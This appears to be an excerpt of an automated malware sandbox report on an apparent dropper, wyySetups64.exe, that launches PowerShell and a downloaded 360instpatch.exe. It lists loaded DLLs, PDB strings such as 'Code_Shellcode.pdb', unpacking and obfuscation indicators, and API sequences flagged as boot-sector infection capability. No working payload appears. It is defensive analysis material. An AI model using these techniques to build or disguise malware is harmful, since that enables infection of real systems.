    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: dinput8.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: devenum.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: msdmo.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: avicap32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: msvfw32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: msimg32.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: version.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: iphlpapi.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wininet.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: urlmon.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: iertutil.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: srvcli.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile written: C:\Users\user\AppData\Local\Temp\!@t3CA2.tmp.dir\setup.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Downloads\360instpatch.exeWindow detected: Number of UI elements: 24
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: wyySetups64.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: wyySetups64.exeStatic file information: File size 3213672 > 1048576
    Source: wyySetups64.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c2200
    Source: wyySetups64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: \Release\Code_Shellcode.pdb source: wyySetups64.exe, wyySetups64.exe, 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.dr
    Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.dr
    Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: wyySetups64.exe, 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.dr
    Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.dr

    Data Obfuscation

    barindex
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\wyySetups64.exeUnpacked PE file: 0.2.wyySetups64.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,0_2_10001170
    Source: wyySetups64.exeStatic PE information: real checksum: 0x318112 should be: 0x317541
    Source: wyySetups64.exe.0.drStatic PE information: real checksum: 0x318112 should be: 0x317541
    Source: wyySetups64.exeStatic PE information: section name: .didata
    Source: wyySetups64.exe.0.drStatic PE information: section name: .didata
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03384345 push ecx; ret 1_2_03384358
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0339A168 push eax; ret 1_2_0339A119
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0339A0B8 push eax; ret 1_2_0339A119
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03392471 push ebp; retf 1_2_03392474
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03392470 push ebp; retf 1_2_03392474
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03392450 push ebp; retf 1_2_03392474
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BD9DF5 push ecx; ret 1_2_00BD9E08
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BEFE9A push ecx; ret 1_2_00BEFEBF
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2CAFF push eax; retf 1_2_00B2CB00
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2CB07 pushad ; retf 1_2_00B2CB08
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2CB0B push 701000CBh; retf 1_2_00B2CB10
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2CB61 pushfd ; retf 1_2_00B2CB64
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B29DCC push ecx; ret 1_2_00B29DDF
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03203D04 push ecx; ret 1_2_03203D17
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03540C7F push eax; retf 0070h6_2_03540CBA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03540CCF push eax; retf 0070h6_2_03540CDA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03540CBF push eax; retf 0070h6_2_03540CCA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B94821 push ecx; ret 8_2_00B94834
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B27330 push ecx; mov dword ptr [esp], 00000000h8_2_00B27331
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B954F9 push ecx; ret 8_2_00B9550C
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B139B0 push ecx; mov dword ptr [esp], 00000000h8_2_00B139B1
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B13C30 push ecx; mov dword ptr [esp], 00000000h8_2_00B13C31
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF38EFC push ecx; ret 8_2_6BF38F0F
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE2640 push ecx; mov dword ptr [esp], 00000000h8_2_6BEE2641
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3BD51 push ecx; ret 8_2_6BF3BD64
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDDE944 push ecx; ret 8_2_6CDDE957
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CD22500 push ecx; mov dword ptr [esp], 00000000h8_2_6CD22501
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDABDEB push edi; retf 8_2_6CDABDF5
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B28144 push dword ptr [ebp+ebp*8+3Bh]; ret 9_2_00B28149
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B94821 push ecx; ret 9_2_00B94834
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B27330 push ecx; mov dword ptr [esp], 00000000h9_2_00B27331

    Persistence and Installation Behavior

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B82158
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_00B92210
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_00B925D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B818BD
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B81A51
